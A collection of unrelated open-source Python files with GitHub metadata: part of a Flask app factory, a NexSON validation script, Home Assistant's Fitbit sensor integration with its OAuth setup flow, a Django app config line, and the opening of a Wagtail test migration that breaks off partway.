bcrypt.init_app(app)
# Init the Flask-Login via app object
login_manager.init_app(app)
# Init the Flask-Prinicpal via app object
principals.init_app(app)
# 因为 identity_loaded 信号实现函数,需要访问 app 对象, 所以直接在 create_app() 中实现.
@identity_loaded.connect_via(app)
def on_identity_loaded(sender, identity):
"""Change the role via add the Need object into Role.
Need the access the app object.
"""
# Set the identity user object
identity.user = current_user
# Add the UserNeed to the identity user object
if hasattr(current_user, 'id'):
identity.provides.add(UserNeed(current_user.id))
# Add each role to the identity user object
if hasattr(current_user, 'roles'):
# 原本多对多的用户权限,现在改成用户对应角色 一对多,取消for循环
# for role in current_user.roles:
role = current_user.roles
identity.provides.add(RoleNeed(role.name))
app.static_folder = 'theme/static'
app.template_folder = 'theme/templates'
# 定义 404,405 等、这里只定义 404
@app.errorhandler(404)
def page_not_found(error):
return render_template('40X/404.html'), 404
from videoonline.view import root_view
from videoonline.admin import admin_view
app.register_blueprint(root_view, url_prefix = '/')
app.register_blueprint(admin_view, url_prefix = '/admin')
return app
| {
"content_hash": "a5d073bac2d2bb203bd46565de21f787",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 78,
"avg_line_length": 36.540983606557376,
"alnum_prop": 0.6155226558995065,
"repo_name": "zgoo/OVSS-I",
"id": "35e9e9d073d040d30a00bf561e53a9a1ebedc2d2",
"size": "2417",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "videoonline/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "56"
},
{
"name": "HTML",
"bytes": "37830"
},
{
"name": "JavaScript",
"bytes": "484"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "23143"
}
],
"symlink_target": ""
} |
import sys
SCRIPT_NAME = __name__ #@TODO replace with logger...
ERR_STREAM = sys.stderr #@TODO replace with logger...
from nexson_validator import NexSON, NexSONError, ValidationLogger, FilteringLogger, WarningCodes
def error(msg):
global SCRIPT_NAME, ERR_STREAM
ERR_STREAM.write('{n}: ERROR: {m}'.format(n=SCRIPT_NAME,
m=msg))
if not msg.endswith('\n'):
ERR_STREAM.write('\n')
def warn(msg):
global SCRIPT_NAME, ERR_STREAM
ERR_STREAM.write('{n}: WARNING: {m}'.format(n=SCRIPT_NAME,
m=msg))
if not msg.endswith('\n'):
ERR_STREAM.write('\n')
def info(msg):
global SCRIPT_NAME, ERR_STREAM
ERR_STREAM.write('{n}: {m}'.format(n=SCRIPT_NAME,
m=msg))
if not msg.endswith('\n'):
ERR_STREAM.write('\n')
if __name__ == '__main__':
import json
import os
import codecs
import argparse
sys.stdout = codecs.getwriter('utf-8')(sys.stdout)
sys.stderr = codecs.getwriter('utf-8')(sys.stderr)
parser = argparse.ArgumentParser(description='Validate a json file as Open Tree of Life NexSON')
parser.add_argument('--verbose', dest='verbose', action='store_true', default=False, help='verbose output')
parser.add_argument('--meta', dest='meta', action='store_true', default=False, help='warn about unvalidated meta elements')
parser.add_argument('input', metavar='filepath', type=unicode, nargs=1, help='filename')
args = parser.parse_args()
SCRIPT_NAME = os.path.split(sys.argv[0])[-1]
try:
inp_filepath = args.input[0]
except:
sys.exit('Expecting a filepath to a NexSON file as the only argument.\n')
inp = codecs.open(inp_filepath, 'rU', encoding='utf-8')
try:
obj = json.load(inp)
except ValueError as vx:
error('Not valid JSON.')
if args.verbose:
raise vx
else:
sys.exit(1)
if not args.meta:
v = FilteringLogger(codes_to_skip=[WarningCodes.UNVALIDATED_ANNOTATION])
else:
v = ValidationLogger()
try:
n = NexSON(obj, v)
except NexSONError as nx:
error(nx.value)
sys.exit(1)
if (not v.errors) and (not v.warnings):
info('Valid')
elif v.errors:
for el in v.errors:
error(el)
else:
for el in v.warnings:
warn(el)
| {
"content_hash": "e040c479eab2f3fa0c825b314df3b585",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 127,
"avg_line_length": 35.114285714285714,
"alnum_prop": 0.5850284784377543,
"repo_name": "leto/new_opentree_api",
"id": "785ab74f98424df54041f3914d6a9b9f2e39730a",
"size": "2480",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nexson-validator/scripts/validate_ot_nexson.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "150369"
},
{
"name": "Shell",
"bytes": "6452"
}
],
"symlink_target": ""
} |
"""
Support for the Fitbit API.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.fitbit/
"""
import os
import logging
import datetime
import time
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components.http import HomeAssistantView
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import ATTR_ATTRIBUTION
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.icon import icon_for_battery_level
import homeassistant.helpers.config_validation as cv
from homeassistant.util.json import load_json, save_json
REQUIREMENTS = ['fitbit==0.3.0']
_CONFIGURING = {}
_LOGGER = logging.getLogger(__name__)
ATTR_ACCESS_TOKEN = 'access_token'
ATTR_REFRESH_TOKEN = 'refresh_token'
ATTR_CLIENT_ID = 'client_id'
ATTR_CLIENT_SECRET = 'client_secret'
ATTR_LAST_SAVED_AT = 'last_saved_at'
CONF_MONITORED_RESOURCES = 'monitored_resources'
CONF_CLOCK_FORMAT = 'clock_format'
CONF_ATTRIBUTION = 'Data provided by Fitbit.com'
DEPENDENCIES = ['http']
FITBIT_AUTH_CALLBACK_PATH = '/api/fitbit/callback'
FITBIT_AUTH_START = '/api/fitbit'
FITBIT_CONFIG_FILE = 'fitbit.conf'
FITBIT_DEFAULT_RESOURCES = ['activities/steps']
SCAN_INTERVAL = datetime.timedelta(minutes=30)
DEFAULT_CONFIG = {
'client_id': 'CLIENT_ID_HERE',
'client_secret': 'CLIENT_SECRET_HERE'
}
FITBIT_RESOURCES_LIST = {
'activities/activityCalories': ['Activity Calories', 'cal', 'fire'],
'activities/calories': ['Calories', 'cal', 'fire'],
'activities/caloriesBMR': ['Calories BMR', 'cal', 'fire'],
'activities/distance': ['Distance', '', 'map-marker'],
'activities/elevation': ['Elevation', '', 'walk'],
'activities/floors': ['Floors', 'floors', 'walk'],
'activities/heart': ['Resting Heart Rate', 'bpm', 'heart-pulse'],
'activities/minutesFairlyActive':
['Minutes Fairly Active', 'minutes', 'walk'],
'activities/minutesLightlyActive':
['Minutes Lightly Active', 'minutes', 'walk'],
'activities/minutesSedentary':
['Minutes Sedentary', 'minutes', 'seat-recline-normal'],
'activities/minutesVeryActive': ['Minutes Very Active', 'minutes', 'run'],
'activities/steps': ['Steps', 'steps', 'walk'],
'activities/tracker/activityCalories':
['Tracker Activity Calories', 'cal', 'fire'],
'activities/tracker/calories': ['Tracker Calories', 'cal', 'fire'],
'activities/tracker/distance': ['Tracker Distance', '', 'map-marker'],
'activities/tracker/elevation': ['Tracker Elevation', '', 'walk'],
'activities/tracker/floors': ['Tracker Floors', 'floors', 'walk'],
'activities/tracker/minutesFairlyActive':
['Tracker Minutes Fairly Active', 'minutes', 'walk'],
'activities/tracker/minutesLightlyActive':
['Tracker Minutes Lightly Active', 'minutes', 'walk'],
'activities/tracker/minutesSedentary':
['Tracker Minutes Sedentary', 'minutes', 'seat-recline-normal'],
'activities/tracker/minutesVeryActive':
['Tracker Minutes Very Active', 'minutes', 'run'],
'activities/tracker/steps': ['Tracker Steps', 'steps', 'walk'],
'body/bmi': ['BMI', 'BMI', 'human'],
'body/fat': ['Body Fat', '%', 'human'],
'body/weight': ['Weight', '', 'human'],
'devices/battery': ['Battery', None, None],
'sleep/awakeningsCount':
['Awakenings Count', 'times awaken', 'sleep'],
'sleep/efficiency': ['Sleep Efficiency', '%', 'sleep'],
'sleep/minutesAfterWakeup': ['Minutes After Wakeup', 'minutes', 'sleep'],
'sleep/minutesAsleep': ['Sleep Minutes Asleep', 'minutes', 'sleep'],
'sleep/minutesAwake': ['Sleep Minutes Awake', 'minutes', 'sleep'],
'sleep/minutesToFallAsleep':
['Sleep Minutes to Fall Asleep', 'minutes', 'sleep'],
'sleep/startTime': ['Sleep Start Time', None, 'clock'],
'sleep/timeInBed': ['Sleep Time in Bed', 'minutes', 'hotel']
}
FITBIT_MEASUREMENTS = {
'en_US': {
'duration': 'ms',
'distance': 'mi',
'elevation': 'ft',
'height': 'in',
'weight': 'lbs',
'body': 'in',
'liquids': 'fl. oz.',
'blood glucose': 'mg/dL',
'battery': '',
},
'en_GB': {
'duration': 'milliseconds',
'distance': 'kilometers',
'elevation': 'meters',
'height': 'centimeters',
'weight': 'stone',
'body': 'centimeters',
'liquids': 'milliliters',
'blood glucose': 'mmol/L',
'battery': '',
},
'metric': {
'duration': 'milliseconds',
'distance': 'kilometers',
'elevation': 'meters',
'height': 'centimeters',
'weight': 'kilograms',
'body': 'centimeters',
'liquids': 'milliliters',
'blood glucose': 'mmol/L',
'battery': '',
}
}
BATTERY_LEVELS = {
'High': 100,
'Medium': 50,
'Low': 20,
'Empty': 0
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_MONITORED_RESOURCES, default=FITBIT_DEFAULT_RESOURCES):
vol.All(cv.ensure_list, [vol.In(FITBIT_RESOURCES_LIST)]),
vol.Optional(CONF_CLOCK_FORMAT, default='24H'):
vol.In(['12H', '24H'])
})
def request_app_setup(hass, config, add_devices, config_path,
discovery_info=None):
"""Assist user with configuring the Fitbit dev application."""
configurator = hass.components.configurator
# pylint: disable=unused-argument
def fitbit_configuration_callback(callback_data):
"""Handle configuration updates."""
config_path = hass.config.path(FITBIT_CONFIG_FILE)
if os.path.isfile(config_path):
config_file = load_json(config_path)
if config_file == DEFAULT_CONFIG:
error_msg = ("You didn't correctly modify fitbit.conf",
" please try again")
configurator.notify_errors(_CONFIGURING['fitbit'],
error_msg)
else:
setup_platform(hass, config, add_devices, discovery_info)
else:
setup_platform(hass, config, add_devices, discovery_info)
start_url = "{}{}".format(hass.config.api.base_url,
FITBIT_AUTH_CALLBACK_PATH)
description = """Please create a Fitbit developer app at
https://dev.fitbit.com/apps/new.
For the OAuth 2.0 Application Type choose Personal.
Set the Callback URL to {}.
They will provide you a Client ID and secret.
These need to be saved into the file located at: {}.
Then come back here and hit the below button.
""".format(start_url, config_path)
submit = "I have saved my Client ID and Client Secret into fitbit.conf."
_CONFIGURING['fitbit'] = configurator.request_config(
'Fitbit', fitbit_configuration_callback,
description=description, submit_caption=submit,
description_image="/static/images/config_fitbit_app.png"
)
def request_oauth_completion(hass):
"""Request user complete Fitbit OAuth2 flow."""
configurator = hass.components.configurator
if "fitbit" in _CONFIGURING:
configurator.notify_errors(
_CONFIGURING['fitbit'], "Failed to register, please try again.")
return
# pylint: disable=unused-argument
def fitbit_configuration_callback(callback_data):
"""Handle configuration updates."""
start_url = '{}{}'.format(hass.config.api.base_url, FITBIT_AUTH_START)
description = "Please authorize Fitbit by visiting {}".format(start_url)
_CONFIGURING['fitbit'] = configurator.request_config(
'Fitbit', fitbit_configuration_callback,
description=description,
submit_caption="I have authorized Fitbit."
)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Fitbit sensor."""
config_path = hass.config.path(FITBIT_CONFIG_FILE)
if os.path.isfile(config_path):
config_file = load_json(config_path)
if config_file == DEFAULT_CONFIG:
request_app_setup(
hass, config, add_devices, config_path, discovery_info=None)
return False
else:
config_file = save_json(config_path, DEFAULT_CONFIG)
request_app_setup(
hass, config, add_devices, config_path, discovery_info=None)
return False
if "fitbit" in _CONFIGURING:
hass.components.configurator.request_done(_CONFIGURING.pop("fitbit"))
import fitbit
access_token = config_file.get(ATTR_ACCESS_TOKEN)
refresh_token = config_file.get(ATTR_REFRESH_TOKEN)
expires_at = config_file.get(ATTR_LAST_SAVED_AT)
if None not in (access_token, refresh_token):
authd_client = fitbit.Fitbit(config_file.get(ATTR_CLIENT_ID),
config_file.get(ATTR_CLIENT_SECRET),
access_token=access_token,
refresh_token=refresh_token,
expires_at=expires_at,
refresh_cb=lambda x: None)
if int(time.time()) - expires_at > 3600:
authd_client.client.refresh_token()
authd_client.system = authd_client.user_profile_get()["user"]["locale"]
if authd_client.system != 'en_GB':
if hass.config.units.is_metric:
authd_client.system = 'metric'
else:
authd_client.system = 'en_US'
dev = []
registered_devs = authd_client.get_devices()
clock_format = config.get(CONF_CLOCK_FORMAT)
for resource in config.get(CONF_MONITORED_RESOURCES):
# monitor battery for all linked FitBit devices
if resource == 'devices/battery':
for dev_extra in registered_devs:
dev.append(FitbitSensor(
authd_client, config_path, resource,
hass.config.units.is_metric, clock_format, dev_extra))
else:
dev.append(FitbitSensor(
authd_client, config_path, resource,
hass.config.units.is_metric, clock_format))
add_devices(dev, True)
else:
oauth = fitbit.api.FitbitOauth2Client(
config_file.get(ATTR_CLIENT_ID),
config_file.get(ATTR_CLIENT_SECRET))
redirect_uri = '{}{}'.format(hass.config.api.base_url,
FITBIT_AUTH_CALLBACK_PATH)
fitbit_auth_start_url, _ = oauth.authorize_token_url(
redirect_uri=redirect_uri,
scope=['activity', 'heartrate', 'nutrition', 'profile',
'settings', 'sleep', 'weight'])
hass.http.register_redirect(FITBIT_AUTH_START, fitbit_auth_start_url)
hass.http.register_view(FitbitAuthCallbackView(
config, add_devices, oauth))
request_oauth_completion(hass)
class FitbitAuthCallbackView(HomeAssistantView):
"""Handle OAuth finish callback requests."""
requires_auth = False
url = FITBIT_AUTH_CALLBACK_PATH
name = 'api:fitbit:callback'
def __init__(self, config, add_devices, oauth):
"""Initialize the OAuth callback view."""
self.config = config
self.add_devices = add_devices
self.oauth = oauth
@callback
def get(self, request):
"""Finish OAuth callback request."""
from oauthlib.oauth2.rfc6749.errors import MismatchingStateError
from oauthlib.oauth2.rfc6749.errors import MissingTokenError
hass = request.app['hass']
data = request.query
response_message = """Fitbit has been successfully authorized!
You can close this window now!"""
result = None
if data.get('code') is not None:
redirect_uri = '{}{}'.format(
hass.config.api.base_url, FITBIT_AUTH_CALLBACK_PATH)
try:
result = self.oauth.fetch_access_token(data.get('code'),
redirect_uri)
except MissingTokenError as error:
_LOGGER.error("Missing token: %s", error)
response_message = """Something went wrong when
attempting authenticating with Fitbit. The error
encountered was {}. Please try again!""".format(error)
except MismatchingStateError as error:
_LOGGER.error("Mismatched state, CSRF error: %s", error)
response_message = """Something went wrong when
attempting authenticating with Fitbit. The error
encountered was {}. Please try again!""".format(error)
else:
_LOGGER.error("Unknown error when authing")
response_message = """Something went wrong when
attempting authenticating with Fitbit.
An unknown error occurred. Please try again!
"""
if result is None:
_LOGGER.error("Unknown error when authing")
response_message = """Something went wrong when
attempting authenticating with Fitbit.
An unknown error occurred. Please try again!
"""
html_response = """<html><head><title>Fitbit Auth</title></head>
<body><h1>{}</h1></body></html>""".format(response_message)
if result:
config_contents = {
ATTR_ACCESS_TOKEN: result.get('access_token'),
ATTR_REFRESH_TOKEN: result.get('refresh_token'),
ATTR_CLIENT_ID: self.oauth.client_id,
ATTR_CLIENT_SECRET: self.oauth.client_secret,
ATTR_LAST_SAVED_AT: int(time.time())
}
save_json(hass.config.path(FITBIT_CONFIG_FILE), config_contents)
hass.async_add_job(setup_platform, hass, self.config, self.add_devices)
return html_response
class FitbitSensor(Entity):
"""Implementation of a Fitbit sensor."""
def __init__(self, client, config_path, resource_type,
is_metric, clock_format, extra=None):
"""Initialize the Fitbit sensor."""
self.client = client
self.config_path = config_path
self.resource_type = resource_type
self.is_metric = is_metric
self.clock_format = clock_format
self.extra = extra
self._name = FITBIT_RESOURCES_LIST[self.resource_type][0]
if self.extra:
self._name = '{0} Battery'.format(self.extra.get('deviceVersion'))
unit_type = FITBIT_RESOURCES_LIST[self.resource_type][1]
if unit_type == "":
split_resource = self.resource_type.split('/')
try:
measurement_system = FITBIT_MEASUREMENTS[self.client.system]
except KeyError:
if self.is_metric:
measurement_system = FITBIT_MEASUREMENTS['metric']
else:
measurement_system = FITBIT_MEASUREMENTS['en_US']
unit_type = measurement_system[split_resource[-1]]
self._unit_of_measurement = unit_type
self._state = 0
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
@property
def icon(self):
"""Icon to use in the frontend, if any."""
if self.resource_type == 'devices/battery' and self.extra:
battery_level = BATTERY_LEVELS[self.extra.get('battery')]
return icon_for_battery_level(battery_level=battery_level,
charging=None)
return 'mdi:{}'.format(FITBIT_RESOURCES_LIST[self.resource_type][2])
@property
def device_state_attributes(self):
"""Return the state attributes."""
attrs = {}
attrs[ATTR_ATTRIBUTION] = CONF_ATTRIBUTION
if self.extra:
attrs['model'] = self.extra.get('deviceVersion')
attrs['type'] = self.extra.get('type').lower()
return attrs
def update(self):
"""Get the latest data from the Fitbit API and update the states."""
if self.resource_type == 'devices/battery' and self.extra:
self._state = self.extra.get('battery')
else:
container = self.resource_type.replace("/", "-")
response = self.client.time_series(self.resource_type, period='7d')
raw_state = response[container][-1].get('value')
if self.resource_type == 'activities/distance':
self._state = format(float(raw_state), '.2f')
elif self.resource_type == 'activities/tracker/distance':
self._state = format(float(raw_state), '.2f')
elif self.resource_type == 'body/bmi':
self._state = format(float(raw_state), '.1f')
elif self.resource_type == 'body/fat':
self._state = format(float(raw_state), '.1f')
elif self.resource_type == 'body/weight':
self._state = format(float(raw_state), '.1f')
elif self.resource_type == 'sleep/startTime':
if raw_state == '':
self._state = '-'
elif self.clock_format == '12H':
hours, minutes = raw_state.split(':')
hours, minutes = int(hours), int(minutes)
setting = 'AM'
if hours > 12:
setting = 'PM'
hours -= 12
elif hours == 0:
hours = 12
self._state = '{}:{} {}'.format(hours, minutes, setting)
else:
self._state = raw_state
else:
if self.is_metric:
self._state = raw_state
else:
try:
self._state = '{0:,}'.format(int(raw_state))
except TypeError:
self._state = raw_state
if self.resource_type == 'activities/heart':
self._state = response[container][-1]. \
get('value').get('restingHeartRate')
token = self.client.client.session.token
config_contents = {
ATTR_ACCESS_TOKEN: token.get('access_token'),
ATTR_REFRESH_TOKEN: token.get('refresh_token'),
ATTR_CLIENT_ID: self.client.client.client_id,
ATTR_CLIENT_SECRET: self.client.client.client_secret,
ATTR_LAST_SAVED_AT: int(time.time())
}
save_json(self.config_path, config_contents)
| {
"content_hash": "e1d380eefbe191d624299ca33f7292e5",
"timestamp": "",
"source": "github",
"line_count": 490,
"max_line_length": 79,
"avg_line_length": 38.8734693877551,
"alnum_prop": 0.5831058378832423,
"repo_name": "ewandor/home-assistant",
"id": "35748b30ecf4bb65c2e89c8c1ee5130616a35d18",
"size": "19048",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/sensor/fitbit.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8860790"
},
{
"name": "Ruby",
"bytes": "517"
},
{
"name": "Shell",
"bytes": "12639"
}
],
"symlink_target": ""
} |
default_app_config = 'django_pph.apps.DjangoPPHAppConfig'
| {
"content_hash": "31ecef20a677e640eb9e142637bce9e1",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 57,
"avg_line_length": 58,
"alnum_prop": 0.8103448275862069,
"repo_name": "PolyPasswordHasher/PolyPasswordHasher-Django",
"id": "16f2f887b4a2805faf09f321ee506c847bed6937",
"size": "58",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_pph/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "71747"
}
],
"symlink_target": ""
} |
import django.db.models.deletion
import modelcluster.contrib.taggit
import modelcluster.fields
import taggit.managers
from django.conf import settings
from django.db import migrations, models
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
import wagtail.images.models
import wagtail.search.index
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('wagtailimages', '0010_change_on_delete_behaviour'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('wagtailcore', '0024_alter_page_content_type_on_delete_behaviour'),
('taggit', '0002_auto_20150616_2121'),
('wagtaildocs', '0005_alter_uploaded_by_user_on_delete_action'),
]
operations = [
migrations.CreateModel(
name='Advert',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.URLField(blank=True, null=True)),
('text', models.CharField(max_length=255)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AdvertPlacement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('colour', models.CharField(max_length=255)),
('advert', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='tests.Advert')),
],
),
migrations.CreateModel(
name='AdvertTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content_object', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='tagged_items', to='tests.Advert')),
('tag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tests_adverttag_items', to='taggit.Tag')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AdvertWithTabbedInterface',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.URLField(blank=True, null=True)),
('text', models.CharField(max_length=255)),
('something_else', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='BlogCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80, unique=True)),
],
),
migrations.CreateModel(
name='BlogCategoryBlogPage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='tests.BlogCategory')),
],
),
migrations.CreateModel(
name='BusinessChild',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='BusinessIndex',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='BusinessNowherePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='BusinessSubIndex',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='CustomImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, verbose_name='title')),
('file', models.ImageField(height_field='height', upload_to=wagtail.images.models.get_upload_to, verbose_name='file', width_field='width')),
('width', models.IntegerField(editable=False, verbose_name='width')),
('height', models.IntegerField(editable=False, verbose_name='height')),
('created_at', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created at')),
('focal_point_x', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_y', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_width', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_height', models.PositiveIntegerField(blank=True, null=True)),
('file_size', models.PositiveIntegerField(editable=False, null=True)),
('caption', models.CharField(max_length=255)),
('not_editable_field', models.CharField(max_length=255)),
('tags', taggit.managers.TaggableManager(blank=True, help_text=None, through='taggit.TaggedItem', to='taggit.Tag', verbose_name='tags')),
('uploaded_by_user', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='uploaded by user')),
],
options={
'abstract': False,
},
bases=(models.Model, wagtail.search.index.Indexed),
),
migrations.CreateModel(
name='CustomImageFilePath',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, verbose_name='title')),
('file', models.ImageField(height_field='height', upload_to=wagtail.images.models.get_upload_to, verbose_name='file', width_field='width')),
('width', models.IntegerField(editable=False, verbose_name='width')),
('height', models.IntegerField(editable=False, verbose_name='height')),
('created_at', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created at')),
('focal_point_x', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_y', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_width', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_height', models.PositiveIntegerField(blank=True, null=True)),
('file_size', models.PositiveIntegerField(editable=False, null=True)),
('tags', taggit.managers.TaggableManager(blank=True, help_text=None, through='taggit.TaggedItem', to='taggit.Tag', verbose_name='tags')),
('uploaded_by_user', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='uploaded by user')),
],
options={
'abstract': False,
},
bases=(models.Model, wagtail.search.index.Indexed),
),
migrations.CreateModel(
name='CustomManagerPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventIndex',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('date_from', models.DateField(null=True, verbose_name='Start date')),
('date_to', models.DateField(blank=True, help_text='Not required if event is on a single day', null=True, verbose_name='End date')),
('time_from', models.TimeField(blank=True, null=True, verbose_name='Start time')),
('time_to', models.TimeField(blank=True, null=True, verbose_name='End time')),
('audience', models.CharField(choices=[('public', 'Public'), ('private', 'Private')], max_length=255)),
('location', models.CharField(max_length=255)),
('body', wagtail.core.fields.RichTextField(blank=True)),
('cost', models.CharField(max_length=255)),
('signup_link', models.URLField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventPageCarouselItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('embed_url', models.URLField(blank=True, verbose_name='Embed URL')),
('caption', models.CharField(blank=True, max_length=255)),
('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='EventPageChooserModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='EventPageRelatedLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('title', models.CharField(help_text='Link title', max_length=255)),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='EventPageSpeaker',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('first_name', models.CharField(blank=True, max_length=255, verbose_name='Name')),
('last_name', models.CharField(blank=True, max_length=255, verbose_name='Surname')),
('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='FilePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('file_field', models.FileField(upload_to='')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='FormField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time')], max_length=16, verbose_name='field type')),
('required', models.BooleanField(default=True, verbose_name='required')),
